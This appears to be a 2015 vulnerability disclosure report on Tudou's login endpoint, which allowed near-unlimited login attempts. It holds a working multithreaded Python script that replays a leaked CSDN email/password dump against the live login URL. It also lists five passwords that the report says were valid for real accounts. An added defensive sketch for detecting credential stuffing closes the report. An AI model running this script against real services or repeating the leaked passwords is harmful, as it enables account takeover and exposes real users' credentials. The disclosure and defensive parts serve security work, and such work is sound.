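2015-06-23: Details reported to the vendor; awaiting vendor handling
2015-06-23: Vendor has confirmed; details disclosed to the vendor only
2015-07-03: Details disclosed to core white hats and experts in related fields
2015-07-13: Details disclosed to regular white hats
2015-07-23: Details disclosed to intern white hats
2015-08-07: Details disclosed to the public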
As in the title.
Endpoint:
http://login.tudou.com//passport/ytLogin.do?jsoncallback=jQuery17203996445555239916_1434721317917&loginname=test&passwd=test&remember=1&from=http%3A%2F%2F114.80.122.152%3A8080%2F&_=1434721510212'
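Brute-forcing loginname and passwd is not restricted, but once the number of repeated submissions exceeds 500 (the exact number was not tested), the IP address is restricted. After a while, however, the restriction is lifted again.

Python fuzz code: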
```python
#!/usr/bin/env python
#-*-coding:utf-8-*-
import httplib2
import urllib2
import urllib
import socket
import socks
from urllib import urlopen
from string import replace,find,lower
from httplib import HTTPException
from urllib import urlencode
import time
import threadpool
import threading
import pdb
import traceback

pdb.set_trace()
mutex = threading.Lock()

class fuzz(object):
    def __init__(self,user_pwd,count):
        self.user_pwd = user_pwd
        self.good = []
        self.count = count
        self.threadnum = 10

    def makePackage(self,euser,epwd):
        url = 'http://login.tudou.com//passport/ytLogin.do?jsoncallback=jQuery17203996445555239916_1434721317917&loginname='+euser+'&passwd='+epwd+'&remember=1&from=http%3A%2F%2F114.80.122.152%3A8080%2F&_=1434721510212'
        headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36',
                   'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8'}
        h = httplib2.Http()
        try:
            res,con = h.request(url)
        except Exception,ex:
            print Exception,":",ex
            traceback.print_exc()
            return
        i = con.find('success')
        t = []
        if i != -1:
            if mutex.acquire():
                self.good.append([euser,epwd])
                print euser+':'+epwd+'\n'
                mutex.release()
        else:
            pass

    def preS(self):
        base = 0
        for each in self.user_pwd:
            self.makePackage(each[0],each[1][0:-1])
            if mutex.acquire():
                if len(self.good) != base:
                    self.save()
                    base = len(self.good)
                mutex.release()

    def save(self):
        fp = open('result','w')
        for each in self.good:
            fp.writelines(each[0]+' '+each[1]+'\n')
        fp.close()

    def gothread(self):
        # create the thread pool
        pool = threadpool.ThreadPool(self.threadnum)
        # to merge two lists, simply add them
        count = 0
        base = 0
        for i in range(self.count):
            print self.user_pwd[i][0]+'----user-----\n' + self.user_pwd[i][1] + '---pass---\n'
            if mutex.acquire():
                if len(self.good) != base:
                    self.save()
                    print 'OK\n'
                    base = len(self.good)
                mutex.release()
            pool.add_task(self.makePackage,self.user_pwd[i][0],self.user_pwd[i][1])
        #join and destroy all threads
        pool.destroy()

if __name__=='__main__':
    f = open('csdn_email','r')
    up = []
    count = 0
    while True:
        line = f.readline()
        if line:
            i = line.find(' ')
            user = line[0:i]
            pwd = line[i+1:]
            up.append([user,pwd])
            count = count + 1
        else:
            break
    f.close()
    test = fuzz(up,count)
    test.preS()
```
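Because this was tested only once, CSDN e-mail addresses and passwords were used for the test. Valid username/password pairs obtained after one round of testing:

[email protected] 730413
[email protected] jamstang
[email protected] Swhy920520
[email protected] my1316pass
[email protected] xinghong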
Defend against credential stuffing.
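The report notes that the only control was an IP restriction after roughly 500 repeated submissions, lifted again after a while. As an added example (not code from the report or from the vendor), the sketch below shows server-side detection keyed on how many distinct accounts one IP fails against, plus a per-account failure limit that holds across IPs. The class name, verdict names and all thresholds are assumptions chosen for illustration, and the sample events are constructed.

```python
from collections import defaultdict, deque

WINDOW_S = 300              # assumed sliding window, in seconds
MAX_ACCOUNTS_PER_IP = 5     # assumed: distinct accounts one IP may fail against
MAX_FAILS_PER_ACCOUNT = 10  # assumed: failures per account, across all IPs


class StuffingDetector:
    """Sliding-window login monitor; timestamps must be non-decreasing."""

    def __init__(self):
        self.by_ip = defaultdict(deque)       # ip -> (ts, account) failures
        self.by_account = defaultdict(deque)  # account -> (ts, ip) failures

    @staticmethod
    def _expire(queue, now):
        while queue and now - queue[0][0] > WINDOW_S:
            queue.popleft()

    def check(self, ts, ip, account, success):
        """Record one login attempt and return the set of rules it trips."""
        ip_q, acct_q = self.by_ip[ip], self.by_account[account]
        self._expire(ip_q, ts)
        self._expire(acct_q, ts)
        if not success:
            ip_q.append((ts, account))
            acct_q.append((ts, ip))
        verdicts = set()
        if len({acct for _, acct in ip_q}) > MAX_ACCOUNTS_PER_IP:
            verdicts.add("ip_spread")               # block or challenge this IP
            if success:
                verdicts.add("suspicious_success")  # force step-up or reset
        if len(acct_q) > MAX_FAILS_PER_ACCOUNT:
            verdicts.add("account_throttle")        # slow this account, any source
        return verdicts


def replay(events):
    """Run (ts, ip, account, success) tuples; return those that trip a rule."""
    det = StuffingDetector()
    hits = []
    for ts, ip, account, success in events:
        verdicts = det.check(ts, ip, account, success)
        if verdicts:
            hits.append((ts, ip, account, sorted(verdicts)))
    return hits


# Constructed sample: one IP walks a leaked list, one user mistypes a password.
SAMPLE = [(i, "203.0.113.7", "user%d@example.test" % i, False) for i in range(8)]
SAMPLE += [(8, "203.0.113.7", "user8@example.test", True)]
SAMPLE += [(t, "198.51.100.4", "alice@example.test", False) for t in (9, 10, 11)]
```

With these thresholds the walking IP is flagged on its sixth distinct account rather than after hundreds of requests, and the login that succeeds from it is marked for review.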
Severity: Medium
Vulnerability Rank: 6
Confirmed at: 2015-06-23 18:40
Known issue, thank you.
None yet.